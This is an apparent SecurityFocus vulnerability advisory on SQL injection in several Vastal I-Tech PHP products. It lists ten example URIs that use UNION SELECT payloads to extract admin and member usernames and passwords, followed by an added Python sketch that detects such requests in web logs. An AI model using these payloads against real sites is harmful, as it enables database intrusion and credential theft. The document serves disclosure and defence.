Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users

http://www.example.com/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users

http://www.example.com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users

http://example.com/view_product.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*

http://www.example.com/view_product.php?cat_id=-1/**/UNION/**/SELECT/**/concat_ws(0x3a,admin_user,admin_password)/**/from/**/admin_users/*

http://www.example.com/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*

http://www.example.com/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*

http://www.example.com/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*

http://www.example.com/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*

http://www.example.com/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
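A detection sketch for requests shaped like the URIs above, added here as an example and not part of the original advisory: it flags UNION SELECT payloads (including the /**/ and + space substitutes) and any non-integer value in the ID parameters those URIs use. The log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters injected in the example URIs on this page; each should be a plain integer.
NUMERIC_PARAMS = {"id", "news_id", "cat_id", "game_id", "coder_id"}
COMMENT = re.compile(r"/\*.*?\*/", re.S)            # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Turn SQL inline comments into spaces and drop an unterminated trailing /*."""
    value = COMMENT.sub(" ", value).split("/*", 1)[0]
    return " ".join(value.split())

def inspect_request(target):
    """Return (param, reason) findings for one request target."""
    findings = []
    # parse_qsl percent-decodes and maps '+' to a space, so both encodings are covered.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS:
            continue
        cleaned = normalize(value)
        if UNION_SELECT.search(cleaned):
            findings.append((name, "union-select"))
        elif not re.fullmatch(r"\d+", cleaned):
            findings.append((name, "non-numeric"))   # includes negative IDs such as -1
    return findings

def scan_log(lines):
    """Return (client, target, findings) for every log line with a finding."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and (found := inspect_request(m.group(2))):
            hits.append((m.group(1), m.group(2), found))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /view_news.php?id=42 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2010:10:00:05 +0000] "GET /view_news.php?id=-1+union+select+1,2,3,4 HTTP/1.1" 200 498',
    '203.0.113.7 - - [01/Jan/2010:10:00:09 +0000] "GET /game.php?yes=1&game_id=-1%2F**%2FUNION%2F**%2FSELECT%2F**%2F1,22222,3,4,5,6%2F* HTTP/1.1" 200 731',
    "198.51.100.3 - - [01/Jan/2010:10:01:00 +0000] \"GET /view_product.php?cat_id=7' HTTP/1.1\" 500 0",
]

if __name__ == "__main__":
    for client, target, found in scan_log(SAMPLE_LOG):
        print(client, found, target)
```

The same integer-only rule, enforced in the application before the value reaches the query, is what closes the issue; log matching only shows who has been probing.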

Copyright 2010, SecurityFocus